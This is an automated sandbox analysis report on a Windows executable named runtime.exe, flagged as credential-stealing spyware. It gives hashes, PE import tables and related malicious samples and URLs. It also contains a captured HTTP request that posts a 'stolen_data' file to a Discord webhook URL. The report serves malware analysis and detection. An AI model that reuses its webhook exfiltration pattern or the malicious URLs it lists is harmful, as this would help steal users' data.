              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 43s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:runtime.exe
              Detection:MAL
              Classification:mal64.spyw.evad.winEXE@2/3@2/1
              EGA Information:Failed
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target runtime.exe, PID 1816 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKey calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • VT rate limit hit for: runtime.exe
              No simulations
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              162.159.138.232General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                  xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                    SecuriteInfo.com.Win32.MalwareX-gen.3620.22364.exeGet hashmaliciousUnknownBrowse
                      S_code_runner.ps1Get hashmaliciousUnknownBrowse
                        cr_asm3.ps1Get hashmaliciousUnknownBrowse
                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                              xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  discord.comruntime.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.128.233
                                  General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                  • 162.159.138.232
                                  LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.138.232
                                  Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.128.233
                                  xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.136.232
                                  https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.135.232
                                  570ZenR882.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.135.232
                                  570ZenR882.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.137.232
                                  Ff0ZjqSI9Y.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.137.232
                                  SecuriteInfo.com.Win32.MalwareX-gen.3620.22364.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.137.232
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUSruntime.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.128.233
                                  lUAc7lqa56.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.0.5
                                  https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613Get hashmaliciousUnknownBrowse
                                  • 104.18.90.62
                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                  • 104.18.91.123
                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                  • 104.22.149.180
                                  Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                  • 188.114.97.3
                                  Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                  • 188.114.97.3
                                  Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                  • 188.114.97.3
                                  Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                  • 188.114.96.3
                                  Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                  • 188.114.96.3
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eruntime.exeGet hashmaliciousUnknownBrowse
                                  • 162.159.138.232
                                  https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613Get hashmaliciousUnknownBrowse
                                  • 162.159.138.232
                                  nicegirlwithnewthingswhichevennobodknowthatkissingme.htaGet hashmaliciousCobalt StrikeBrowse
                                  • 162.159.138.232
                                  #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 162.159.138.232
                                  EXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletOpsistype.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                  • 162.159.138.232
                                  QYP0tD7z0c.exeGet hashmaliciousDCRatBrowse
                                  • 162.159.138.232
                                  https://docsend.com/view/44v95uq7wngs3w6tGet hashmaliciousHTMLPhisher, HtmlDropperBrowse
                                  • 162.159.138.232
                                  http://nativestories.org/Get hashmaliciousHTMLPhisherBrowse
                                  • 162.159.138.232
                                  http://www.ncimusic.com/Get hashmaliciousUnknownBrowse
                                  • 162.159.138.232
                                  General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                  • 162.159.138.232
                                  No context
                                  Process:C:\Users\user\Desktop\runtime.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                  Category:dropped
                                  Size (bytes):40960
                                  Entropy (8bit):0.8553638852307782
                                  Encrypted:false
                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                  Malicious:true
                                  Reputation:high, very likely benign file
                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\runtime.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                  Category:dropped
                                  Size (bytes):51200
                                  Entropy (8bit):0.8745947603342119
                                  Encrypted:false
                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                  MD5:378391FDB591852E472D99DC4BF837DA
                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                  Malicious:true
                                  Reputation:moderate, very likely benign file
                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\runtime.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):2
                                  Entropy (8bit):1.0
                                  Encrypted:false
                                  SSDEEP:3:H:H
                                  MD5:D751713988987E9331980363E24189CE
                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:[]
                                  File type:PE32+ executable (console) x86-64, for MS Windows
                                  Entropy (8bit):6.324580732723733
                                  TrID:
                                  • Win64 Executable Console (202006/5) 92.65%
                                  • Win64 Executable (generic) (12005/4) 5.51%
                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                  • DOS Executable Generic (2002/1) 0.92%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:runtime.exe
                                  File size:4'795'392 bytes
                                  MD5:f299098a2f6fbaa7902f87344c965525
                                  SHA1:8b7e39918834826b0497243862b40671444fe939
                                  SHA256:a799052d8068f5f2ecfefee27c690abb3f3de90bbd98e5b0a4459f0827b3fec2
                                  SHA512:b55b923759cf3c7b546fdb819ac3d7103ac10f0a271e23b5993f09ac31b640d3ee7923eeb449b388ac08c8da1521ccc858dd91594e37fae7f6a973c1ad236d04
                                  SSDEEP:49152:bDUiB9OEnnxl+BGB5Ii30epccgxTkUv8X7W4jNzIddFLdsa06S/QT/Dc+lv9SFPp:XUSlKLdv8sV8kFF4FP
                                  TLSH:80266B127B9949ADC05AC074C2878763AA7274CA0B31BBEF458492783F66EF52F3D354
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g....r...r...r..~....r...s...r...q...r...v...r...w...r..~s...r...s...r...v...r...r...r...p...r.Rich..r.................PE..d..
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0x140311040
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x140000000
                                  Subsystem:windows cui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671ACAEF [Thu Oct 24 22:32:15 2024 UTC]
                                  TLS Callbacks:0x401c6c90, 0x1
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:e1e3fcb58e3e7419c5648677137ed0c0
                                  Instruction
                                  dec eax
                                  sub esp, 28h
                                  call 00007FE63C4FACB0h
                                  dec eax
                                  add esp, 28h
                                  jmp 00007FE63C4FA247h
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  int3
                                  nop word ptr [eax+eax+00000000h]
                                  dec eax
                                  sub esp, 10h
                                  dec esp
                                  mov dword ptr [esp], edx
                                  dec esp
                                  mov dword ptr [esp+08h], ebx
                                  dec ebp
                                  xor ebx, ebx
                                  dec esp
                                  lea edx, dword ptr [esp+18h]
                                  dec esp
                                  sub edx, eax
                                  dec ebp
                                  cmovb edx, ebx
                                  dec esp
                                  mov ebx, dword ptr [00000010h]
                                  dec ebp
                                  cmp edx, ebx
                                  jnc 00007FE63C4FA3E8h
                                  inc cx
                                  and edx, 8D4DF000h
                                  wait
                                  add al, dh
                                  Programming Language:
                                  • [IMP] VS2008 SP1 build 30729
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x45a6340x1f4.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4660000x28bd8.pdata
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x48f0000x7420.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3e96700x54.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x3e97000x28.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3e95300x140.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x31e0000x880.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x31c1cf0x31c200487e1f1c48474a0f29c67583ddcad626unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x31e0000x13e51a0x13e600e4f1baf138f9415f1cc5b8e79685f139False0.31088044758539457OpenPGP Public Key5.330342591480829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x45d0000x89980x7e0076facdd89953a83ffc25776d0cf200f3False0.30397445436507936zlib compressed data3.60958952424797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .pdata0x4660000x28bd80x28c00b8ab8e64d4b5f857634a0c8b302d51a3False0.4903362250766871data6.4126817773179985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x48f0000x74200x7600d2950465dc2a0651506b3c1410843e6fFalse0.3491459216101695data5.440818427813764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  DLLImport
                                  bcryptprimitives.dllProcessPrng
                                  api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressSingle, WakeByAddressAll
                                  Secur32.dllFreeCredentialsHandle, AcquireCredentialsHandleA, QueryContextAttributesW, DeleteSecurityContext, DecryptMessage, FreeContextBuffer, InitializeSecurityContextW, AcceptSecurityContext, EncryptMessage, ApplyControlToken
                                  KERNEL32.dllUnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, IsDebuggerPresent, InitializeSListHead, CreateMutexA, GetModuleHandleA, CreateThread, ReadConsoleW, WriteConsoleW, ExitProcess, CloseHandle, LocalFree, GetComputerNameExW, GetProcAddress, FreeLibrary, GetSystemInfo, CreateFileW, GlobalMemoryStatusEx, K32GetPerformanceInfo, GetCurrentProcessId, VirtualQueryEx, GetProcessTimes, GetProcessHeap, HeapFree, OpenProcess, GetSystemTimes, GetProcessIoCounters, HeapAlloc, ReadProcessMemory, LoadLibraryExA, GetLastError, WaitForSingleObject, FormatMessageW, FlushFileBuffers, GetTickCount, QueryPerformanceCounter, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, GetSystemTimeAsFileTime, WideCharToMultiByte, SystemTimeToFileTime, GetFileSize, LockFileEx, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, HeapReAlloc, DeleteFileW, DeleteFileA, WaitForSingleObjectEx, LoadLibraryA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, Sleep, MultiByteToWideChar, HeapSize, HeapValidate, UnmapViewOfFile, GetFileAttributesW, CreateMutexW, GetTempPathW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, GetFullPathNameW, HeapCreate, ReadFile, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, GetModuleHandleW, SetHandleInformation, CreateIoCompletionPort, GetQueuedCompletionStatusEx, PostQueuedCompletionStatus, SetFileCompletionNotificationModes, AddVectoredExceptionHandler, SetThreadStackGuarantee, GetCurrentThread, SwitchToThread, CreateWaitableTimerExW, SetWaitableTimer, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetLastError, GetCurrentDirectoryW, GetEnvironmentVariableW, SetFileInformationByHandle, GetCurrentProcess, SetFilePointerEx, GetStdHandle, TerminateProcess, QueryPerformanceFrequency, GetSystemTimePreciseAsFileTime, lstrlenW, ReleaseMutex, FindClose, GetFileInformationByHandle, GetFileInformationByHandleEx, FindFirstFileW, GetFinalPathNameByHandleW, CopyFileExW, GetConsoleMode
                                  ntdll.dllNtWriteFile, NtCancelIoFileEx, NtCreateFile, NtQueryInformationProcess, NtReadFile, RtlGetVersion, NtQuerySystemInformation, NtDeviceIoControlFile, RtlNtStatusToDosError
                                  user32.dllMessageBoxW
                                  crypt32.dllCertEnumCertificatesInStore, CertAddCertificateContextToStore, CertOpenStore, CryptUnprotectData, CertGetCertificateChain, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertDuplicateCertificateContext, CertDuplicateStore, CertDuplicateCertificateChain, CertFreeCertificateChain, CertCloseStore
                                  advapi32.dllGetUserNameW, SystemFunction036, GetTokenInformation, OpenProcessToken, RegCloseKey, RegOpenKeyExW, RegQueryValueExW, CopySid, GetLengthSid, IsValidSid
                                  pdh.dllPdhCollectQueryData, PdhOpenQueryA, PdhCloseQuery, PdhRemoveCounter, PdhGetFormattedCounterValue, PdhAddEnglishCounterW
                                  powrprof.dllCallNtPowerInformation
                                  oleaut32.dllGetErrorInfo, SysStringLen, SysFreeString
                                  psapi.dllGetModuleFileNameExW, GetProcessMemoryInfo
                                  shell32.dllCommandLineToArgvW
                                  bcrypt.dllBCryptGenRandom
                                  ws2_32.dllWSASend, send, getpeername, recv, setsockopt, shutdown, getsockopt, ioctlsocket, connect, bind, WSASocketW, closesocket, getsockname, getaddrinfo, freeaddrinfo, WSACleanup, WSAStartup, WSAGetLastError, WSAIoctl
                                  VCRUNTIME140.dllmemmove, __current_exception_context, __current_exception, memcpy, __CxxFrameHandler3, memset, memcmp, strrchr, _CxxThrowException, __C_specific_handler
                                  api-ms-win-crt-string-l1-1-0.dllstrcspn, strcmp, strncmp, strlen, wcslen
                                  api-ms-win-crt-heap-l1-1-0.dllmalloc, realloc, free, _msize, _set_new_mode
                                  api-ms-win-crt-utility-l1-1-0.dllqsort
                                  api-ms-win-crt-time-l1-1-0.dll_localtime64_s
                                  api-ms-win-crt-runtime-l1-1-0.dll_configure_narrow_argv, _set_app_type, _c_exit, _cexit, _initialize_narrow_environment, _get_initial_narrow_environment, _beginthreadex, __p___argv, __p___argc, _initterm_e, _register_thread_local_exe_atexit_callback, _initterm, exit, _exit, _endthreadex, _register_onexit_function, _crt_atexit, _seh_filter_exe, _initialize_onexit_table, terminate
                                  api-ms-win-crt-math-l1-1-0.dll__setusermatherr, log
                                  api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                  api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 25, 2024 09:11:14.938121080 CEST49712443192.168.2.6162.159.138.232
                                  Oct 25, 2024 09:11:14.938170910 CEST44349712162.159.138.232192.168.2.6
                                  Oct 25, 2024 09:11:14.938247919 CEST49712443192.168.2.6162.159.138.232
                                  Oct 25, 2024 09:11:14.980936050 CEST49712443192.168.2.6162.159.138.232
                                  Oct 25, 2024 09:11:14.980967045 CEST44349712162.159.138.232192.168.2.6
                                  Oct 25, 2024 09:11:15.593632936 CEST44349712162.159.138.232192.168.2.6
                                  Oct 25, 2024 09:11:15.593779087 CEST49712443192.168.2.6162.159.138.232
                                  Oct 25, 2024 09:11:15.597136021 CEST49712443192.168.2.6162.159.138.232
                                  Oct 25, 2024 09:11:15.597150087 CEST44349712162.159.138.232192.168.2.6
                                  Oct 25, 2024 09:11:15.597487926 CEST44349712162.159.138.232192.168.2.6
                                  Oct 25, 2024 09:11:15.649322033 CEST49712443192.168.2.6162.159.138.232
                                  Oct 25, 2024 09:11:15.809510946 CEST49712443192.168.2.6162.159.138.232
                                  Oct 25, 2024 09:11:15.855336905 CEST44349712162.159.138.232192.168.2.6
                                  Oct 25, 2024 09:11:16.125365973 CEST44349712162.159.138.232192.168.2.6
                                  Oct 25, 2024 09:11:16.125444889 CEST44349712162.159.138.232192.168.2.6
                                  Oct 25, 2024 09:11:16.125540972 CEST49712443192.168.2.6162.159.138.232
                                  Oct 25, 2024 09:11:16.140695095 CEST49712443192.168.2.6162.159.138.232
                                  Oct 25, 2024 09:11:16.140731096 CEST44349712162.159.138.232192.168.2.6
                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 25, 2024 09:11:14.124351978 CEST6302653192.168.2.61.1.1.1
                                  Oct 25, 2024 09:11:14.924443960 CEST53630261.1.1.1192.168.2.6
                                  Oct 25, 2024 09:11:39.047909975 CEST5357630162.159.36.2192.168.2.6
                                  Oct 25, 2024 09:11:39.883569002 CEST5031753192.168.2.61.1.1.1
                                  Oct 25, 2024 09:11:39.892072916 CEST53503171.1.1.1192.168.2.6
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Oct 25, 2024 09:11:14.124351978 CEST192.168.2.61.1.1.10xd76fStandard query (0)discord.comA (IP address)IN (0x0001)false
                                  Oct 25, 2024 09:11:39.883569002 CEST192.168.2.61.1.1.10x697aStandard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Oct 25, 2024 09:11:14.924443960 CEST1.1.1.1192.168.2.60xd76fNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                  Oct 25, 2024 09:11:14.924443960 CEST1.1.1.1192.168.2.60xd76fNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                  Oct 25, 2024 09:11:14.924443960 CEST1.1.1.1192.168.2.60xd76fNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                  Oct 25, 2024 09:11:14.924443960 CEST1.1.1.1192.168.2.60xd76fNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                  Oct 25, 2024 09:11:14.924443960 CEST1.1.1.1192.168.2.60xd76fNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                  Oct 25, 2024 09:11:39.892072916 CEST1.1.1.1192.168.2.60x697aName error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                  • discord.com
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.649712162.159.138.2324431816C:\Users\user\Desktop\runtime.exe
                                  TimestampBytes transferredDirectionData
                                  2024-10-25 07:11:15 UTC286OUTPOST /api/webhooks/1299085791254937640/Kk0DcgSpuWBwS9yryFX1nlEjkFwrVh2is32Q3WMk6aukk3R6R7FDurnupZArnouhEkR5 HTTP/1.1
                                  content-type: multipart/form-data; boundary=3d28d627302b1d54-3080abd9c0330841-eabd41003bdf51bb-1e53a08729f1926d
                                  content-length: 509
                                  accept: */*
                                  host: discord.com
                                  2024-10-25 07:11:15 UTC509OUTData Raw: 2d 2d 33 64 32 38 64 36 32 37 33 30 32 62 31 64 35 34 2d 33 30 38 30 61 62 64 39 63 30 33 33 30 38 34 31 2d 65 61 62 64 34 31 30 30 33 62 64 66 35 31 62 62 2d 31 65 35 33 61 30 38 37 32 39 66 31 39 32 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 73 74 6f 6c 65 6e 5f 64 61 74 61 5f 32 30 32 34 31 30 32 35 5f 30 38 33 34 32 39 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 5b 5d 0d 0a 2d 2d 33 64 32 38 64 36 32 37 33 30 32 62 31 64 35 34 2d 33 30 38 30 61 62 64 39 63 30 33 33 30 38 34 31 2d 65 61 62 64 34 31 30 30 33 62 64 66 35 31 62 62 2d 31 65 35 33 61 30 38 37 32 39
                                  Data Ascii: --3d28d627302b1d54-3080abd9c0330841-eabd41003bdf51bb-1e53a08729f1926dContent-Disposition: form-data; name="file"; filename="stolen_data_20241025_083429.txt"Content-Type: text/plain[]--3d28d627302b1d54-3080abd9c0330841-eabd41003bdf51bb-1e53a08729
                                  2024-10-25 07:11:16 UTC1251INHTTP/1.1 404 Not Found
                                  Date: Fri, 25 Oct 2024 07:11:16 GMT
                                  Content-Type: application/json
                                  Content-Length: 45
                                  Connection: close
                                  Cache-Control: public, max-age=3600, s-maxage=3600
                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                  x-ratelimit-limit: 5
                                  x-ratelimit-remaining: 4
                                  x-ratelimit-reset: 1729840277
                                  x-ratelimit-reset-after: 1
                                  via: 1.1 google
                                  alt-svc: h3=":443"; ma=86400
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IIP0D3aRQk1L8yXSNpYeaAjncrxByOMzUuOTJYf1Wi6GWpGqortYvk7BdDgt9jMyKoTcsEy5TMHF3uleOOXQiZzwkvZXIIyBDTGNb4LywP%2B0jM262N2y9Ghb5WB6"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  X-Content-Type-Options: nosniff
                                  Set-Cookie: __cfruid=672774b61d688e89340cc611b24790905df7aefa-1729840276; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                  Set-Cookie: _cfuvid=Fm4XHW3.LuKeG.98VTGt97lVmseXkzzkM6wIbRC1bbA-1729840276066-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                  Server: cloudflare
                                  CF-RAY: 8d80643cebfc2cc7-DFW
                                  2024-10-25 07:11:16 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                  Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:03:11:07
                                  Start date:25/10/2024
                                  Path:C:\Users\user\Desktop\runtime.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\Desktop\runtime.exe"
                                  Imagebase:0x7ff7aa2b0000
                                  File size:4'795'392 bytes
                                  MD5 hash:F299098A2F6FBAA7902F87344C965525
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:03:11:07
                                  Start date:25/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff66e660000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Reset < >
                                    APIs
                                    Memory Dump Source
